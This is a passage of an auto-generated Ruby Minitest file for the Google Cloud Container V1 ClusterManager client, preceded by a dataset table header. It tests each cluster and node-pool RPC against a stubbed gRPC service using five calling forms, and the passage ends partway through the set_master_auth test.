hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
# frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "helper"
require "gapic/grpc/service_stub"
require "google/container/v1/cluster_service_pb"
require "google/container/v1/cluster_service_services_pb"
require "google/cloud/container/v1/cluster_manager"
class ::Google::Cloud::Container::V1::ClusterManager::ClientTest < Minitest::Test
# Minimal hand-rolled double for Gapic::ServiceStub. It counts call_rpc
# invocations, records whatever the optional verification block returns for
# each call, and replays a canned response/operation pair.
class ClientStub
  attr_accessor :call_rpc_count, :requests

  def initialize response, operation, &block
    @response = response
    @operation = operation
    @block = block
    @call_rpc_count = 0
    @requests = []
  end

  # Mirrors Gapic::ServiceStub#call_rpc: runs the recorded verification
  # block (if any), yields the canned response/operation to the caller's
  # block, and returns the canned response.
  def call_rpc *args, **kwargs
    self.call_rpc_count += 1
    requests.push(@block&.call(*args, **kwargs))
    yield @response, @operation if block_given?
    @response
  end
end
# Verifies ClusterManager::Client#list_clusters through a stubbed
# transport, exercising every supported calling convention.
def test_list_clusters
  # Canned objects the stubbed transport hands back.
  expected_response = ::Google::Cloud::Container::V1::ListClustersResponse.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  test_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  call_options = {}
  # Field values for the unary request.
  project_id = "hello world"
  zone = "hello world"
  parent = "hello world"
  service_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :list_clusters, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::ListClustersRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["parent"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, service_stub do
    # Client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = test_channel
    end
    # Positional hash form.
    client.list_clusters({ project_id: project_id, zone: zone, parent: parent }) do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end
    # Keyword-argument form.
    client.list_clusters project_id: project_id, zone: zone, parent: parent do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end
    # Request-object form.
    client.list_clusters ::Google::Cloud::Container::V1::ListClustersRequest.new(project_id: project_id, zone: zone, parent: parent) do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end
    # Hash form with explicit call options.
    client.list_clusters({ project_id: project_id, zone: zone, parent: parent }, call_options) do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end
    # Request-object form with explicit call options.
    client.list_clusters ::Google::Cloud::Container::V1::ListClustersRequest.new(project_id: project_id, zone: zone, parent: parent), call_options do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end
    # All five invocations above must have reached the stub.
    assert_equal 5, service_stub.call_rpc_count
  end
end
# Exercises ClusterManager::Client#get_cluster against a stubbed service,
# covering all five supported invocation forms.
def test_get_cluster
  # Create GRPC objects replayed by the stub.
  grpc_response = ::Google::Cloud::Container::V1::Cluster.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a unary method.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  name = "hello world"
  # Block param renamed to `rpc_name` so it no longer shadows the `name`
  # request-field local declared above.
  get_cluster_client_stub = ClientStub.new grpc_response, grpc_operation do |rpc_name, request, options:|
    assert_equal :get_cluster, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::GetClusterRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, get_cluster_client_stub do
    # Create client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use hash object
    client.get_cluster({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use named arguments
    client.get_cluster project_id: project_id, zone: zone, cluster_id: cluster_id, name: name do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object
    client.get_cluster ::Google::Cloud::Container::V1::GetClusterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use hash object with options
    client.get_cluster({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object with options
    client.get_cluster ::Google::Cloud::Container::V1::GetClusterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name), grpc_options do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Verify all five calls reached the stub.
    assert_equal 5, get_cluster_client_stub.call_rpc_count
  end
end
# Verifies ClusterManager::Client#create_cluster through a stubbed
# transport, exercising every supported calling convention.
def test_create_cluster
  # Canned objects the stubbed transport hands back.
  expected_response = ::Google::Cloud::Container::V1::Operation.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  test_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  call_options = {}
  # Field values for the unary request.
  project_id = "hello world"
  zone = "hello world"
  cluster = {}
  parent = "hello world"
  service_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :create_cluster, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::CreateClusterRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::Cluster), request["cluster"]
    assert_equal "hello world", request["parent"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, service_stub do
    # Client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = test_channel
    end
    # Positional hash form.
    client.create_cluster({ project_id: project_id, zone: zone, cluster: cluster, parent: parent }) do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end
    # Keyword-argument form.
    client.create_cluster project_id: project_id, zone: zone, cluster: cluster, parent: parent do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end
    # Request-object form.
    client.create_cluster ::Google::Cloud::Container::V1::CreateClusterRequest.new(project_id: project_id, zone: zone, cluster: cluster, parent: parent) do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end
    # Hash form with explicit call options.
    client.create_cluster({ project_id: project_id, zone: zone, cluster: cluster, parent: parent }, call_options) do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end
    # Request-object form with explicit call options.
    client.create_cluster ::Google::Cloud::Container::V1::CreateClusterRequest.new(project_id: project_id, zone: zone, cluster: cluster, parent: parent), call_options do |response, operation|
      assert_equal expected_response, response
      assert_equal expected_operation, operation
    end
    # All five invocations above must have reached the stub.
    assert_equal 5, service_stub.call_rpc_count
  end
end
# Exercises ClusterManager::Client#update_cluster against a stubbed
# service, covering all five supported invocation forms.
def test_update_cluster
  # Create GRPC objects replayed by the stub.
  grpc_response = ::Google::Cloud::Container::V1::Operation.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a unary method.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  update = {}
  name = "hello world"
  # Block param renamed to `rpc_name` so it no longer shadows the `name`
  # request-field local declared above.
  update_cluster_client_stub = ClientStub.new grpc_response, grpc_operation do |rpc_name, request, options:|
    assert_equal :update_cluster, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::UpdateClusterRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    # Hash inputs are coerced to their protobuf message type by the client.
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::ClusterUpdate), request["update"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, update_cluster_client_stub do
    # Create client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use hash object
    client.update_cluster({ project_id: project_id, zone: zone, cluster_id: cluster_id, update: update, name: name }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use named arguments
    client.update_cluster project_id: project_id, zone: zone, cluster_id: cluster_id, update: update, name: name do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object
    client.update_cluster ::Google::Cloud::Container::V1::UpdateClusterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, update: update, name: name) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use hash object with options
    client.update_cluster({ project_id: project_id, zone: zone, cluster_id: cluster_id, update: update, name: name }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object with options
    client.update_cluster ::Google::Cloud::Container::V1::UpdateClusterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, update: update, name: name), grpc_options do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Verify all five calls reached the stub.
    assert_equal 5, update_cluster_client_stub.call_rpc_count
  end
end
# Exercises ClusterManager::Client#update_node_pool against a stubbed
# service, covering all five supported invocation forms.
def test_update_node_pool
  # Create GRPC objects replayed by the stub.
  grpc_response = ::Google::Cloud::Container::V1::Operation.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a unary method.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  node_pool_id = "hello world"
  node_version = "hello world"
  image_type = "hello world"
  name = "hello world"
  locations = ["hello world"]
  workload_metadata_config = {}
  upgrade_settings = {}
  # Block param renamed to `rpc_name` so it no longer shadows the `name`
  # request-field local declared above.
  update_node_pool_client_stub = ClientStub.new grpc_response, grpc_operation do |rpc_name, request, options:|
    assert_equal :update_node_pool, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::UpdateNodePoolRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["node_pool_id"]
    assert_equal "hello world", request["node_version"]
    assert_equal "hello world", request["image_type"]
    assert_equal "hello world", request["name"]
    assert_equal ["hello world"], request["locations"]
    # Hash inputs are coerced to their protobuf message types by the client.
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::WorkloadMetadataConfig), request["workload_metadata_config"]
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::NodePool::UpgradeSettings), request["upgrade_settings"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, update_node_pool_client_stub do
    # Create client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use hash object
    client.update_node_pool({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_version: node_version, image_type: image_type, name: name, locations: locations, workload_metadata_config: workload_metadata_config, upgrade_settings: upgrade_settings }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use named arguments
    client.update_node_pool project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_version: node_version, image_type: image_type, name: name, locations: locations, workload_metadata_config: workload_metadata_config, upgrade_settings: upgrade_settings do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object
    client.update_node_pool ::Google::Cloud::Container::V1::UpdateNodePoolRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_version: node_version, image_type: image_type, name: name, locations: locations, workload_metadata_config: workload_metadata_config, upgrade_settings: upgrade_settings) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use hash object with options
    client.update_node_pool({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_version: node_version, image_type: image_type, name: name, locations: locations, workload_metadata_config: workload_metadata_config, upgrade_settings: upgrade_settings }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object with options
    client.update_node_pool ::Google::Cloud::Container::V1::UpdateNodePoolRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_version: node_version, image_type: image_type, name: name, locations: locations, workload_metadata_config: workload_metadata_config, upgrade_settings: upgrade_settings), grpc_options do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Verify all five calls reached the stub.
    assert_equal 5, update_node_pool_client_stub.call_rpc_count
  end
end
# Exercises ClusterManager::Client#set_node_pool_autoscaling against a
# stubbed service, covering all five supported invocation forms.
def test_set_node_pool_autoscaling
  # Create GRPC objects replayed by the stub.
  grpc_response = ::Google::Cloud::Container::V1::Operation.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a unary method.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  node_pool_id = "hello world"
  autoscaling = {}
  name = "hello world"
  # Block param renamed to `rpc_name` so it no longer shadows the `name`
  # request-field local declared above.
  set_node_pool_autoscaling_client_stub = ClientStub.new grpc_response, grpc_operation do |rpc_name, request, options:|
    assert_equal :set_node_pool_autoscaling, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::SetNodePoolAutoscalingRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["node_pool_id"]
    # Hash inputs are coerced to their protobuf message type by the client.
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::NodePoolAutoscaling), request["autoscaling"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, set_node_pool_autoscaling_client_stub do
    # Create client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use hash object
    client.set_node_pool_autoscaling({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, autoscaling: autoscaling, name: name }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use named arguments
    client.set_node_pool_autoscaling project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, autoscaling: autoscaling, name: name do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object
    client.set_node_pool_autoscaling ::Google::Cloud::Container::V1::SetNodePoolAutoscalingRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, autoscaling: autoscaling, name: name) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use hash object with options
    client.set_node_pool_autoscaling({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, autoscaling: autoscaling, name: name }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object with options
    client.set_node_pool_autoscaling ::Google::Cloud::Container::V1::SetNodePoolAutoscalingRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, autoscaling: autoscaling, name: name), grpc_options do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Verify all five calls reached the stub.
    assert_equal 5, set_node_pool_autoscaling_client_stub.call_rpc_count
  end
end
# Exercises ClusterManager::Client#set_logging_service against a stubbed
# service, covering all five supported invocation forms.
def test_set_logging_service
  # Create GRPC objects replayed by the stub.
  grpc_response = ::Google::Cloud::Container::V1::Operation.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a unary method.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  logging_service = "hello world"
  name = "hello world"
  # Block param renamed to `rpc_name` so it no longer shadows the `name`
  # request-field local declared above.
  set_logging_service_client_stub = ClientStub.new grpc_response, grpc_operation do |rpc_name, request, options:|
    assert_equal :set_logging_service, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::SetLoggingServiceRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["logging_service"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, set_logging_service_client_stub do
    # Create client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use hash object
    client.set_logging_service({ project_id: project_id, zone: zone, cluster_id: cluster_id, logging_service: logging_service, name: name }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use named arguments
    client.set_logging_service project_id: project_id, zone: zone, cluster_id: cluster_id, logging_service: logging_service, name: name do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object
    client.set_logging_service ::Google::Cloud::Container::V1::SetLoggingServiceRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, logging_service: logging_service, name: name) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use hash object with options
    client.set_logging_service({ project_id: project_id, zone: zone, cluster_id: cluster_id, logging_service: logging_service, name: name }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object with options
    client.set_logging_service ::Google::Cloud::Container::V1::SetLoggingServiceRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, logging_service: logging_service, name: name), grpc_options do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Verify all five calls reached the stub.
    assert_equal 5, set_logging_service_client_stub.call_rpc_count
  end
end
# Exercises ClusterManager::Client#set_monitoring_service against a
# stubbed service, covering all five supported invocation forms.
def test_set_monitoring_service
  # Create GRPC objects replayed by the stub.
  grpc_response = ::Google::Cloud::Container::V1::Operation.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a unary method.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  monitoring_service = "hello world"
  name = "hello world"
  # Block param renamed to `rpc_name` so it no longer shadows the `name`
  # request-field local declared above.
  set_monitoring_service_client_stub = ClientStub.new grpc_response, grpc_operation do |rpc_name, request, options:|
    assert_equal :set_monitoring_service, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::SetMonitoringServiceRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["monitoring_service"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, set_monitoring_service_client_stub do
    # Create client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use hash object
    client.set_monitoring_service({ project_id: project_id, zone: zone, cluster_id: cluster_id, monitoring_service: monitoring_service, name: name }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use named arguments
    client.set_monitoring_service project_id: project_id, zone: zone, cluster_id: cluster_id, monitoring_service: monitoring_service, name: name do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object
    client.set_monitoring_service ::Google::Cloud::Container::V1::SetMonitoringServiceRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, monitoring_service: monitoring_service, name: name) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use hash object with options
    client.set_monitoring_service({ project_id: project_id, zone: zone, cluster_id: cluster_id, monitoring_service: monitoring_service, name: name }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object with options
    client.set_monitoring_service ::Google::Cloud::Container::V1::SetMonitoringServiceRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, monitoring_service: monitoring_service, name: name), grpc_options do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Verify all five calls reached the stub.
    assert_equal 5, set_monitoring_service_client_stub.call_rpc_count
  end
end
# Exercises ClusterManager::Client#set_addons_config against a stubbed
# service, covering all five supported invocation forms.
def test_set_addons_config
  # Create GRPC objects replayed by the stub.
  grpc_response = ::Google::Cloud::Container::V1::Operation.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a unary method.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  addons_config = {}
  name = "hello world"
  # Block param renamed to `rpc_name` so it no longer shadows the `name`
  # request-field local declared above.
  set_addons_config_client_stub = ClientStub.new grpc_response, grpc_operation do |rpc_name, request, options:|
    assert_equal :set_addons_config, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::SetAddonsConfigRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    # Hash inputs are coerced to their protobuf message type by the client.
    assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::AddonsConfig), request["addons_config"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, set_addons_config_client_stub do
    # Create client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use hash object
    client.set_addons_config({ project_id: project_id, zone: zone, cluster_id: cluster_id, addons_config: addons_config, name: name }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use named arguments
    client.set_addons_config project_id: project_id, zone: zone, cluster_id: cluster_id, addons_config: addons_config, name: name do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object
    client.set_addons_config ::Google::Cloud::Container::V1::SetAddonsConfigRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, addons_config: addons_config, name: name) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use hash object with options
    client.set_addons_config({ project_id: project_id, zone: zone, cluster_id: cluster_id, addons_config: addons_config, name: name }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object with options
    client.set_addons_config ::Google::Cloud::Container::V1::SetAddonsConfigRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, addons_config: addons_config, name: name), grpc_options do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Verify all five calls reached the stub.
    assert_equal 5, set_addons_config_client_stub.call_rpc_count
  end
end
# Exercises ClusterManager::Client#set_locations against a stubbed
# service, covering all five supported invocation forms.
def test_set_locations
  # Create GRPC objects replayed by the stub.
  grpc_response = ::Google::Cloud::Container::V1::Operation.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a unary method.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  locations = ["hello world"]
  name = "hello world"
  # Block param renamed to `rpc_name` so it no longer shadows the `name`
  # request-field local declared above.
  set_locations_client_stub = ClientStub.new grpc_response, grpc_operation do |rpc_name, request, options:|
    assert_equal :set_locations, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::SetLocationsRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal ["hello world"], request["locations"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, set_locations_client_stub do
    # Create client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use hash object
    client.set_locations({ project_id: project_id, zone: zone, cluster_id: cluster_id, locations: locations, name: name }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use named arguments
    client.set_locations project_id: project_id, zone: zone, cluster_id: cluster_id, locations: locations, name: name do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object
    client.set_locations ::Google::Cloud::Container::V1::SetLocationsRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, locations: locations, name: name) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use hash object with options
    client.set_locations({ project_id: project_id, zone: zone, cluster_id: cluster_id, locations: locations, name: name }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object with options
    client.set_locations ::Google::Cloud::Container::V1::SetLocationsRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, locations: locations, name: name), grpc_options do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Verify all five calls reached the stub.
    assert_equal 5, set_locations_client_stub.call_rpc_count
  end
end
# Exercises ClusterManager::Client#update_master against a stubbed
# service, covering all five supported invocation forms.
def test_update_master
  # Create GRPC objects replayed by the stub.
  grpc_response = ::Google::Cloud::Container::V1::Operation.new
  grpc_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}
  # Create request parameters for a unary method.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  master_version = "hello world"
  name = "hello world"
  # Block param renamed to `rpc_name` so it no longer shadows the `name`
  # request-field local declared above.
  update_master_client_stub = ClientStub.new grpc_response, grpc_operation do |rpc_name, request, options:|
    assert_equal :update_master, rpc_name
    assert_kind_of ::Google::Cloud::Container::V1::UpdateMasterRequest, request
    assert_equal "hello world", request["project_id"]
    assert_equal "hello world", request["zone"]
    assert_equal "hello world", request["cluster_id"]
    assert_equal "hello world", request["master_version"]
    assert_equal "hello world", request["name"]
    refute_nil options
  end
  Gapic::ServiceStub.stub :new, update_master_client_stub do
    # Create client backed by the insecure test channel.
    client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
      config.credentials = grpc_channel
    end
    # Use hash object
    client.update_master({ project_id: project_id, zone: zone, cluster_id: cluster_id, master_version: master_version, name: name }) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use named arguments
    client.update_master project_id: project_id, zone: zone, cluster_id: cluster_id, master_version: master_version, name: name do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object
    client.update_master ::Google::Cloud::Container::V1::UpdateMasterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, master_version: master_version, name: name) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use hash object with options
    client.update_master({ project_id: project_id, zone: zone, cluster_id: cluster_id, master_version: master_version, name: name }, grpc_options) do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Use protobuf object with options
    client.update_master ::Google::Cloud::Container::V1::UpdateMasterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, master_version: master_version, name: name), grpc_options do |response, operation|
      assert_equal grpc_response, response
      assert_equal grpc_operation, operation
    end
    # Verify all five calls reached the stub.
    assert_equal 5, update_master_client_stub.call_rpc_count
  end
end
def test_set_master_auth
  # Doubles returned by the stubbed transport layer.
  expected_response = ::Google::Cloud::Container::V1::Operation.new
  expected_operation = GRPC::ActiveCall::Operation.new nil
  grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
  grpc_options = {}

  # Request field values shared by every invocation style below.
  project_id = "hello world"
  zone = "hello world"
  cluster_id = "hello world"
  action = :UNKNOWN
  update = {}
  name = "hello world"

  # The stub verifies the RPC name and every request field on each call.
  client_stub = ClientStub.new expected_response, expected_operation do |rpc_name, request, options:|
    assert_equal :set_master_auth, rpc_name
